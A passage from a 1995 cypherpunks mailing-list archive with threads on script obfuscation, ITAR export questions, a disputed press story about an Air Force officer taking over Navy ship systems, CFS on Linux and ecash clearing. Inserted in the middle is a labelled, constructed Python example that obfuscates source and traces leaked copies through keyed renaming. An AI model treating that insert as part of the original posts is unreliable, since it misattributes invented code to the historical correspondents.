substitutes all #defines and expands all macros, strips all formatting and
comments, etc., resulting in a perfectly compilable, but infuriatingly
obfuscated set of source files.

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Gehlbach <jeffg@HiWAAY.net>
Date: Thu, 21 Dec 95 21:29:10 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
Message-ID: <9512220528.AA24323@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

At 02:47 PM 12/21/95 -0600, you wrote:
>>| Is there a way to encrypt a script yet still allow it to be runnable?  I
>>| know that the simple answer is to write it in C and compile it but I don't
>>| have the means of doing that at the moment.  (i.e. there is no compiler on
>>| the system)
>>| 
>>| I thought of a few simple protections but they all involve decrypting before
>>| running.
>>
>>	Ever hear of chmod?  chown?
>>Adam
>
>The vendor also has superuser access..  chmod chown won't protect it.. :(

Because I am treading in unfamiliar waters, I will just throw this one on
the table, leaving the discussion to the big boys.  Have you considered
sudo?  I really am not familiar with its capabilities, so easy with the
flames :^>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNpB5Y8AYvAI/GnhAQFx5gP/Ue+KaBLC7gOkH6qFEBKvrKIyvsmObUWU
fvJv59OW4hY+/hCFfqvio3+7wQhwgImin7uEU3gIz+O5hLBRnjhknCqqdmxVPH1F
XuwJSrSdmuLxyRgrSeSc/b2f93Mvu+2cD8VQb0h6QBwe7vfTFNwMqwfcS0a76r2x
lC8IOMH88K8=
=cIYu
-----END PGP SIGNATURE-----




---====<jeffg@hiwaay.net>====--- 
Finger for PGP key & Geek Code * No lemurs were harmed creating this sig.

 "The significant problems we face cannot be solved at the same level of 
  thinking we were at when we created them."	- Albert Einstein



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Gehlbach <jeffg@HiWAAY.net>
Date: Thu, 21 Dec 95 21:48:10 PST
To: cypherpunks@toad.com
Subject: Remote use=export?
Message-ID: <9512220547.AA27294@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I apologize if this is a dead horse, but...

Is granting use of crypto software running in the US to a remote user
outside the US considered exportation?  For example, if I allow my friend in
Paris to use a PGP binary residing and running on my PC in Washington, is
either of us violating any ITAR or similar restrictions?
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNpGc48AYvAI/GnhAQHJnAQAxzOPDbj5dzy6Xu/45h+nipatGBgw7tvP
+kcHUypA+oMmx1tBuCEz3UjpWIBCY5Nf5LD1sNToHGXJdHtLHG1t7coes8jFHRfL
8mVJNMckuPxwv5rLSVR6i5kWqvaz9UYsEpdjR2tROmyKCEHwNC+yy1OfRP1F65xi
nEjvksPjv/U=
=DIg7
-----END PGP SIGNATURE-----
---====<jeffg@hiwaay.net>====--- 
Finger for PGP key & Geek Code * No lemurs were harmed creating this sig.

 "The significant problems we face cannot be solved at the same level of 
  thinking we were at when we created them."	- Albert Einstein





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Fri, 22 Dec 95 00:00:39 PST
To: dc-stuff@fc.net
Subject: Air Force hacks Navy? Eeeek!
Message-ID: <Pine.HPP.3.91.951221235554.6915A-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain



Read this.  It's from the Electronic Telegraph, a neat web site in the UK.
This article was later posted to comp.risks, and hence, Risks Forum digest,
which is where I found it.  The paragraphs have been numbered for easy
reference.

----------------------------------------------------------------------------
(paragraph 0)
http://www.telegraph.co.uk/et/                                             
                                                                           
(paragraph 1)
A few clicks and then the e-mail message entered the ship's control
system...
                                                                              
War of the microchips: the day a hacker seized control of a US battleship

(paragraph 2)
BY SIMPLY dialing the Internet and entering some well-judged keystrokes, a
young US air force captain opened a potentially devastating new era in
warfare in a secret experiment conducted late last September. His target was
no less than gaining unauthorised control of the US Navy's Atlantic Fleet.
             
(paragraph 3)
Watching Pentagon VIPs were sceptical as the young officer attempted to do
something that the old Soviet Union had long tried to do and failed. He was
going to enter the very heart of the United States Navy's warships - their
command and control systems.
   
(paragraph 4)
He was armed with nothing other than a shop-bought computer and modem. He
had no special insider knowledge but was known to be a computer whizzkid,
just like the people the Pentagon most want to keep out.
   
(paragraph 5)
As he connected with the local node of the Internet provider, the silence
was tangible. The next few seconds would be vital. Would the world's most
powerful navy be in a position to stop him?

(paragraph 6)
A few clicks and whirrs were the only signs of activity. And then a
seemingly simple e-mail message entered the target ship's computer system.
   
(paragraph 7)
First there was jubilation, then horror, back on dry land in the control
room at the Electronic Systems Centre at Hanscom Air Force Base in
Massachusetts. Within a few seconds the computer screen announced "Control
is complete."
                                                                              
(paragraph 8)
Out at sea, the Captain had no idea that command of his multi-million-dollar
warship had passed to another. One by one, more targeted ships surrendered
control as the codes buried in the e-mail message multiplied inside the
ships' computers. A whole naval battle group was, in effect, being run down
a phone-line. Fortunately, this invader was benevolent. But if he could do
it ...
                                                                              
(paragraph 9)
 Only very senior naval commanders were in the know as the
"Joint Warrior" exercise, a number of experiments to test defence systems,
unfolded between September 18-25. Taking over the warships was the
swiftest and most alarming of the electronic "raids" - and a true shock
for US military leaders. "This shows we have a long way to go in
protecting our information systems," said a senior executive at the
airbase where the experiment was conducted. 

(paragraph 10)                                                                              
The exact method of entry remains a classified secret. But the Pentagon
wanted to be the first to test the extent of their vulnerability to the new
"cyberwarriors" - and had the confidence to admit it.
    
(paragraph 11)                                                                          
Now they believe they know what they are dealing with and the defences are
going up.
    
(paragraph 12)                                                                       
Reply to Electronic Telegraph - et@telegraph.co.uk
Electronic Telegraph is a Registered Service Mark of The Telegraph plc

--------------------------------------------------------------------------

This sounds very fantastic, like the plot of a movie.  Indeed, _Hackers_
featured a "worm" that took over control of the ballast of oil tankers.
Perhaps this is a case of a journalist being a good writer but not fully
understanding the topic at hand. 

Does anyone know how true this article is?  Or where we could find more
info?  If it is true, then this is almost scary. 

Let's pick the article apart: 

In paragraph (1), the author refers to "the day a hacker seized control
over a US battleship."  I assume that "hacker" and "battleship" are being
used loosely, as, as noted in an IW-list posting that I received a few
minutes ago, there are no currently active US battleships. (?)

In paragraphs (2) and (5), the author refers to the "hacker" "dialing the
internet" and "[he] connected with the local node of the Internet
provider."  This implies that the whole operation was conducted over the
internet.  Do battleships even have internet connections?  They may.  But
the military certainly wouldn't dialup through a civilian ISP where their
data goes through unknown hands to perform a very secret operation. 
Everything is doubtlessly encrypted - was the attack performed with or
without keys?  Or was the crypto somehow bypassed? 
                         
The intruder is referred to as "young US air force captain" in par 2, a
"young officer" in par 3, a "computer whizzkid" in par 4, an "invader" in
par 8, and a "cyberwarrior" in par 10.  Who was he?  I would assume that
it was more likely a group of people who were "in the know." Even the
average "Joe Hacker" (is there such a thing?) would have trouble
controlling a "battleship" let alone through an ASCII connection. 

In par 2, the author states that the intruder was attempting to gain
"unauthorised control of the US Navy's Atlantic Fleet" (sic). If these
were indeed "Joint Warrior" experiments, then it would be authorized. 

Throughout the article, references are made to the attack beginning
with "a simple email message."  This could be possible, but it seems
that a higher means of control would be necessary.

Anyhow, the whole article seems factually incorrect.  I'm very 
interested in finding out more on what ACTUALLY happened, tho..

Tobin Fricke
fricke@roboben.engr.ucdavis.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 21 Dec 95 21:27:23 PST
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512201915.UAA00215@asylum.berserk.com>
Message-ID: <Pine.SUN.3.91.951222001714.9575A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Alex de Joode wrote:

> Is there anyone out there that has CFS running with Linux ?
> 
> It installs fine on BSDi 2.0 but I'm unable to install it 
> under Linux, I would appreciate it if some one would help
> me out.

I've got it running fine under Linux.  To do this, you have to do several
things:

(1) Use RPC with the 'old style file' option, whatever that is...
(2) Edit out the _'s from the RPC-generated files
(3) Use the modified make command included in the README.

I, for one, hope that Matt Blaze fixes (or at least automates :)) these 
quirks in the new version due out RSN...

Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 21 Dec 95 21:56:30 PST
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: on web standards: sent to Markoff
In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.91.951222004543.9575D-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Vladimir Z. Nuri wrote:

> there's been MS flamewars on this list before, but Attila repeats
> various snippets that I find highly objectionable.
> 
> cpunk relevance: operation of the free market

*sigh*  "operation of the free market" isn't necessarily 
cypherpunk-relevant, unless of course all libertarianism is. I, for one, 
consider myself a cypherpunk, and not necessarily 100% behind free 
markets. (I'm still thinking about it.)

In short, can this *please* move off list?
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 21 Dec 95 22:49:28 PST
To: prm-ml@rome.isl.sri.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <9512220648.AA17385@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain


> I suppose the correct answer is, "It depends."
> 
> It depends on your definition of "should" in the above
> paragraph.  If "should" means "in keeping with the NSA's
> mission statement", then I believe the NSA should remain
> quiet and exploit the vulnerability as a national
> technical asset.  If "should" means "in support of US
> commerce", then the answer would be that they should
> announce/fix the vulnerability.
> 
> I'm not sure from your tone which one you believe to be the
> correct definition.  :-) 

I don't know myself.  That's why I still occasionally think about it.  It  
is sometimes comforting to think there is a US agency with the expertise  
of the NSA.  At other times I wonder if we're getting the most for our tax  
money.  Unfortunately, it would be impossible to generate a meaningful  
cost/benefit analysis even if the NSA was not a secret agency.

Of course, if we did not pay taxes there would be no need to wonder if  
we're getting our money's worth.  A self-funded, for-profit NSA?  Now  
there's a libertarian idea if I ever heard one.

Jim_Miller@suite.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Thu, 21 Dec 95 22:16:47 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: re: Encryption Rules Coming
Message-ID: <01HZ38W9ELSI95NNMH@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

>    Encryption rules to be prepared

>    By Andrew Jack in Paris
=snip=
>   Highly sophisticated encryption technology already exists
>    in a number of countries including the US and Sweden. In
>    the US, companies already have access to these programs. A
>    growing number of businesses -- led by the banking sector
>    -- are demanding access to these programs.

ya know, if we could beat the following (true) statement into the
heads of the people who write this stuff, it would go far towards
making people understand how futile it is to try to stop the spread
of encryption technology. 

  "Highly sophisticated encryption technology already exists in every
country on the planet. Anyone with a modem and access to the internet
has access to these programs. The fact is that a very powerful
encryption program can actually be written by hand on a postcard and
mailed anywhere in the world."

i want to rant more on this but will spare the choir of this. is
anyone out there marketing "rsa in 3 lines of perl" as a postcard?
i'm going to have it printed on a business card so i can hand them
out to demonstrate the foolishness of itar in my own way.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
December 22, 1995   0:45





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 Dec 95 18:20:40 PST
To: cypherpunks@toad.com
Subject: Alta Vista caches queries
Message-ID: <199512220220.DAA27203@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's one more reason to worry about the implications of web search
engines: I just stopped in on Digital's new Alta Vista page, and was
surprised to find that the query field was filled in--with a search I ran
3 or 4 days ago. I doublechecked my end pretty thoroughly (scrubbing all
the files that Netscape 2.0b3 [Mac] generates--caches, global history,
etc., and eventually reinstalling Netscape from scratch). And it looks an
awful lot like Alta Vista cached by query according to my IP address.
      Maybe dynamically assigned IPs ain't such a bad idea after all...

Hieronymous
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNoVRb3g0mNE55u1AQEWxAIAiknajMTLiPzKxl4Wz3hoJsE4ntsXQJiV
zNoz9LAW16+7+oFKKPwcjQCTi7heMstT9dP0GjCHmYuCl2cFcmQRbQ==
=HQ12
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 22 Dec 95 03:51:43 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
In-Reply-To: <199512220357.WAA02638@bioanalytical.com>
Message-ID: <9512221147.AA06064@all.net>
MIME-Version: 1.0
Content-Type: text


> > >| Is there a way to encrypt a script yet still allow it to be runnable?  I
> > >| know that the simple answer is to write it in C and compile it but I don't
> > >| have the means of doing that at the moment.  (i.e. there is no compiler on
> > >| the system)
> > >| 
> > >| I thought of a few simple protections but they all involve decrypting before
> > >| running.
> 
> I once had to obfuscate an awk script.  "Cryptography is Economics."  My
> job was to make it difficult for the enemy to steal the source.  There
> was a license agreement...
> 
> The simple answer of "no" is right in the strong sense, but there are
> tricks to make life difficult for the amateur attacker.
> 
> My approach was a self-decrypting program.  The "real" script was
> encrypted within the body of the encasing script.  For increased
> obfuscation, decrypt only small pieces at a time.

There is another technique by which the source is obscured by an
automatic rewrite mechanism.  This provides for both obscuration of the
source and the ability to determine who originated illicit copies.  I
believe it was first implemented by Gimpel Software as part of their
C-terp system (unpublished).  A paper on techniques for doing this has
also been published:

	"Operating System Protection Through Program Evolution"
	Computers and Security - 1992? 3? (F. Cohen)

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
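
[Added example, not part of the original post and not Gimpel's or Cohen's code: a minimal sketch of an automatic rewrite that both obscures source and lets the vendor tell which licensee a leaked copy came from. It swaps in keyed-HMAC renaming for illustration; VENDOR_KEY, the sample script and the licensee names are constructed assumptions, and only plain function/parameter/variable names are handled.]

```python
import ast
import hashlib
import hmac
import io
import tokenize

VENDOR_KEY = b"constructed-demo-key"  # assumption: secret known only to the vendor

# Constructed sample standing in for the licensed script.
SAMPLE = '''\
# compute invoice total (vendor comment, stripped on release)
def total(prices, rate):
    subtotal = sum(prices)  # add up line items
    return subtotal + subtotal * rate
'''


def local_names(source):
    """Identifiers the script defines itself: functions, parameters, assigned variables."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.FunctionDef):
            names.add(node.name)
            names.update(arg.arg for arg in node.args.args)
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
            names.add(node.id)
    return names


def alias(name, licensee):
    """Per-licensee replacement name in the 'axxxxxxx' style, derived with a keyed hash."""
    mac = hmac.new(VENDOR_KEY, f"{licensee}\0{name}".encode(), hashlib.sha256)
    return "a" + mac.hexdigest()[:7]


def shroud(source, licensee):
    """Strip comments and rename local identifiers; the result still runs."""
    mapping = {name: alias(name, licensee) for name in local_names(source)}
    if len(set(mapping.values())) != len(mapping):
        raise ValueError("alias collision; change the key or lengthen the alias")
    out, prev = [], None
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.COMMENT:
            continue  # comments never reach the licensee
        text = tok.string
        # Leave attribute accesses (obj.name) alone: they may belong to other code.
        if tok.type == tokenize.NAME and text in mapping and prev != ".":
            text = mapping[text]
        out.append((tok.type, text))
        prev = tok.string
    return tokenize.untokenize(out)


def attribute(leaked, original, licensees, threshold=0.5):
    """Return the licensee whose aliases best match the leaked copy, or None."""
    wanted = local_names(original)
    if not wanted:
        return None
    present = {t.string
               for t in tokenize.generate_tokens(io.StringIO(leaked).readline)
               if t.type == tokenize.NAME}
    best, best_score = None, 0.0
    for licensee in licensees:
        score = sum(alias(n, licensee) in present for n in wanted) / len(wanted)
        if score > best_score:
            best, best_score = licensee, score
    # A leaker who renames a few symbols by hand still matches above the threshold.
    return best if best_score >= threshold else None


if __name__ == "__main__":
    licensees = ["acme", "globex", "initech"]  # constructed names
    copy = shroud(SAMPLE, "globex")
    print(copy)
    print("leak traced to:", attribute(copy, SAMPLE, licensees))
```

As the thread says of all these tricks, this raises the cost for a casual copier only: a licensee who renames every symbol again defeats the attribution.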



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 22 Dec 95 04:06:16 PST
To: cypherpunks@toad.com
Subject: Navy hacked by Air Force?
Message-ID: <9512221202.AA06399@all.net>
MIME-Version: 1.0
Content-Type: text


Following is the actual text extracted from iw@all.net - I doubt if the
U.S. DoD will want to release all the details, but we can ask!

>From: iw@all.net
Subject: IW Mailing List iw/951221
---------------------------------------------
Moderator's Note:
Subject: Navy hacked by Air Force

I talked to some people I know about the purported IW attack on a
battleship by the Air Force, and I thought I would help debunk this
story, which my contacts tell me is "wildly inaccurate", by looking
at a few facts.  Let's start with the title:

> War of the microchips: the day a hacker seized control of a US battleship

There are NO active US battleships!!! And there weren't any last
September.  So, at a minimum, there are factual errors.

...
> BY SIMPLY dialing the Internet and entering some well-judged keystrokes,
> a young US air force captain opened a potentially devastating new era in
> warfare in a secret experiment conducted late last September.  His
> target was no less than gaining unauthorised control of the US Navy's
> Atlantic Fleet. 

According to my sources this was not "SIMPLY dialing the Internet and
entering some well-judged keystrokes".  It was a controlled experiment
with participation of both Navy and Air Force, and involved a great deal
of planning by a large number of people.  It was performed using DoD
owned and properly keyed cryptographic devices designed to be allowed to
communicate with the systems being attacked.

...
> He was armed with nothing other than a shop-bought computer and modem. 
> He had no special insider knowledge but was known to be a computer
> whizzkid, just like the people the Pentagon most want to keep out.

100% wrong - he was an insider, he had a great deal of assistance, he had
cryptographic devices and keys, and he had special insider knowledge. 
If he was an Air Force captain, he could not have been all that young. 
Whizzkids are usually considered teenagers.  Anyone know of any teenaged
AF captains these days?

...
> A few clicks and whirrs were the only signs of activity.  And then a
> seemingly simple e-mail message entered the target ship's computer
> system. 
...
> targeted ships surrendered control as the codes buried in the e-mail
> message multiplied inside the ships' computers.  A whole naval battle
> group was, in effect, being run down a phone-line.  Fortunately, this

Not quite.  This was not an email sent from some Internet site and email
messages did not multiply inside the ships' computers.  Furthermore, the
total bandwidth of a phone line is nowhere near enough to "run" a naval
battle group, or probably even a naval kitchen for that matter.

> The exact method of entry remains a classified secret.

The first (only?) really true part of the story.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 22 Dec 95 05:21:52 PST
To: Cypherpunks <jeffg@HiWAAY.net>
Subject: Re: Remote use=export?
In-Reply-To: <9512220547.AA27294@fly.HiWAAY.net>
Message-ID: <m0tT7SA-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Gehlbach writes:

: -----BEGIN PGP SIGNED MESSAGE-----
: 
: I apologize if this is a dead horse, but...
: 
: Is granting use of crypto software running in the US to a remote user
: outside the US considered exportation?  For example, if I allow my friend in
: Paris to use a PGP binary residing and running on my PC in Washington, is
: either of us violating any ITAR or similar restrictions?

Nothing about the ITAR is unambiguous, but since what is forbidden is
``exporting'', which includes ``disclosing to foreign persons'', and
since use is not forbidden, it is hard to see how what you suggest
could violate the ITAR.  (And I don't know of any other U.S. law or
regulation that it could violate.)

On the other hand, it may violate French law, which, or so I
understand, does forbid the use of crypto unless the keys are made
available to the French government.  But I really don't know anything
about French law.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Fri, 22 Dec 95 08:37:15 PST
To: cypherpunks@toad.com
Subject: Re: Air Force hacks Navy? Eeeek!
In-Reply-To: <Pine.HPP.3.91.951221235554.6915A-100000@roboben.engr.ucdavis.edu>
Message-ID: <55wx7p3vfz.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Light Ray <fricke@roboben.engr.ucdavis.edu> said:

LR> Read this.  It's from the Electronic Telegraph, a neat web site in
LR> the UK.  This article was later posted to comp.risks, and hence,
LR> Risks Forum digest, which is where I found it.  The paragraphs have
LR> been numbered for easy reference.

[...]

LR> Let's pick the article apart:

[...]

	I saw the IW article that Light Ray saw in the RISKS Digest,
and, while it raises some valid questions, it in turn has some internal
problems.  For example, the IW author apparently doesn't understand the
difference between a Navy captain (O-6) and an Air Force captain (O-3),
dismissing the whole story because a Navy captain would be far too old to
be a 'whizzkid'.  Problem is the story said it was an Air Force captain,
and a newly pinned AF captain would certainly be young enough to be
considered one in the military culture (had I stuck it out through ROTC,
I would have been able to make captain at 24).  While the ET article
looks like it was written by someone who didn't understand the fine
details of what happened, the IW article looks like it was written as
military smokescreen.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Fri, 22 Dec 95 08:47:23 PST
To: fc@all.net
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512221202.AA06399@all.net>
Message-ID: <55vin93uyk.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


On Cypherpunks, fc@all.net (Dr. Frederick B. Cohen) said:

FBC> Following is the actual text extracted from iw@all.net - I doubt if
FBC> the U.S. DoD will want to release all the details, but we can ask!

	Strange, Dr Fred, this isn't the 'actual text' I saw quoted in
RISKS Digest - did you 'fix' it so that it was a bit more credible?

Dr Fred's paragraph:

FBC> 100% wrong - he was an insider, he had a great deal of assistance,
FBC> he had cryptographic devices and keys, and he had special insider
FBC> knowledge.  If he was an Air Force captain, he could not have been
FBC> all that young.  Whizzkids are usually considered teenagers.
FBC> Anyone know of any teenaged AF captains these days?

RISKS Digest's paragraph:

RISKS> 100% wrong - he was an insider, he had a great deal of
RISKS> assistance, he had cryptographic devices and keys, and he had
RISKS> special insider knowledge.  If he was a Navy captain, he could
RISKS> not have been all that young.  Whizzkids are usually considered
RISKS> teenagers.  Anyone know of any teenaged Navy captains?

	Has anyone seen the REAL IW article, so we can tell what was
really said?  The age difference between an AF captain and a Navy
captain is enough that one could be considered a 'whizzkid' in the
military, while the other could not.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Jacoby" <rjacoby1@osf1.gmu.edu>
Date: Fri, 22 Dec 95 07:52:46 PST
To: libernet-d@Dartmouth.EDU
Subject: Re: GAK boycott, What are legal implications?
In-Reply-To: <30d9ca78.flight@flight.hrnowl.lonestar.org>
Message-ID: <Pine.OSF.3.91.951222104632.5379A-100000@osf1.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Dec 1995, Paul Elliott wrote:

Gee, being legally responsible for lost revenue over a boycott.  Rev. Donald 
Wilmond is going to be very broke!  I don't know anything about the NAACP 
case, but it seems to me that free speech & merely *urging* people to 
boycott would be a perfect defense.


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Here is a question for all of you cyber legal types out there.
> This question presupposes: 
> 
> The NIST will complete its work on the GAK standard. But no law will be
> passed (yet) regulating the use of encryption in the U. S. (The GAK standard 
> is an attempt to create an environment in which such laws can be passed.) 
> In the U.S., Big Company INC will start marketing a GAKed encryption 
> product domestically.
> 
> A bunch of cypherpunkish types will immediately try to organize a boycott
> against BIG COMPANY.
> 
> What are the cypherpunks legal risks?
> 
> I seem to remember that back in the 70s, the NAACP lost a big case
> with respect to their boycott in a southern city. As I recall there were people
> in the street begging money for the NAACP because there was a > 10**6 $
> judgement against the NAACP and they needed that much just to appeal.
> 
> 
> - -- 
> Paul Elliott                                  Telephone: 1-713-781-4543
> Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
>                                               Houston Texas 77063
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMNnJ8/BUQYbUhJh5AQGbsgP/T0n31SqeuHt+7AbizymcEhu/78DUuym5
> sj+MO3ruA9WcEBQUXfabuf/PgOwlrtUAcC3dISPvXwGbdygc9oHBfxSglLi48g7d
> dvDS4wziRHF7N8sBsYn0ee9YyKhPd9U7Ci0ovOc5frFGSZ2Bt4hU703d7bR+6cB+
> iHHqsPaAa6o=
> =EPoj
> -----END PGP SIGNATURE-----
> 
> 

Robert A. Jacoby	(speaking only for myself--not legal advice)
Assistant Law Librarian for LAN/Reference
George Mason University Law Library
(703) 993-8107
rjacoby1@osf1.gmu.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Fri, 22 Dec 95 08:55:49 PST
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199512221717.LAA02498@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>        [snip]
>        There is a company called Optoelectronics that markets a radio
>         receiver called the Interceptor.  This is a broad band (several
>         hundred MHz) device designed to lock on to the most powerful signal
>         around, regardless of frequency.  As supplied, it only has a rubber
>         duck antenna, but a broadband, directional antenna (Log Periodic?)
>         could be attached.  There are AM and FM versions that output audio
>         and a version called the Scout that controls a scanner.  These could
>         have outboard devices hung on to them to decode digital signals,
>         record the conversation ... all for less than $1000.
>
>        
>
>        Floyd D. Barber
>        floyddb@alpha.c2.org
>        Key fingerprint:
>        8A 98 1F 6B 70 7A FE 24 
>        35 D4 48 CF 9D F6 B0 91

The problem with the Interceptor is that I think it can only receive one
frequency at a time, and it is adjustable by a thumb wheel, not digitally.
This would tend to make changing frequencies at high rates VERY hard. :)
Also it has no frequency readout, so this means that if you know what freq.
you should be at it is hard to tune in that freq. without searching a little.  
                        Dr0id


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Thu, 21 Dec 95 20:23:01 PST
To: Marcel van der Peijl <bigmac@digicash.com>
Subject: [ecash] Re: Multi-issuer questions
In-Reply-To: <199512191429.PAA01228@digicash.com>
Message-ID: <Pine.SUN.3.91.951222104221.12614B-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, Marcel van der Peijl wrote in the ecash mailing list:

> Q: If user A signs up with bank A, and merchant B signs up with bank B, 
> can user A buy at merchant B?
> 
> A: In theory:
> 
> Bank A and bank B need to have an interbank clearing agreement. User
> A sends his money to merchant B. Merchant B contacts his own bank,
> bank B. Bank B recognizes the money as being issued at bank A,
> contacts bank A, and clears the coins there. Bank A credits bank B's
> account at bank A, bank B sends an acknowledge to merchant B and
> merchant B sends the goods to user A.

	I dispute this even on theoretical grounds.  

Am I right in assuming that the only reason Bank B has in contacting Bank
A is to confirm that the ecash hasn't been double spent?  Once that is
confirmed, there should be no need for contact between the two banks. 
Bank A should not have to credit Bank B's account as there has been no
transfer from Bank A to Bank B.  The transfer has been the deposit from
Bank B's customer to Bank B. Bank B is already "credited", i.e., its 
(e)cash reserves have increased, the moment Bank A confirms that the 
ecash is valid.

But this also makes a second assumption: that ecash is truly an open 
standard, i.e., that ecash is a "widely acceptable means of payment."  
Any ecash issuing bank must be obligated to accept customer ecash 
deposits with one and only one condition: that the originally issuing bank 
must validate it.

Now what if this weren't so?  What if Bank B said "I didn't originally
issue this ecash and thus, I won't accept its deposit."  Now this puts the
"cashness" of ecash into some jeopardy. It doesn't immediately make ecash 
useless, but it puts an auxiliary condition to it.  This concerns the 
difference between Validation and Acceptance.  Validation is when Bank B 
checks the ecash with its original issuer to see if it has been double 
spent.  Acceptance is actually accepting that ecash as a deposit.  

If Bank B refuses to Validate any non-Bank-B ecash then ecash pretty much
fails.  Period.  How would Bank B's customer be able to handle commerce
with non-Bank-B buyers?  By having multiple accounts with multiple Banks? 
What if the number of ecash issuers mushrooms into the hundreds?  In
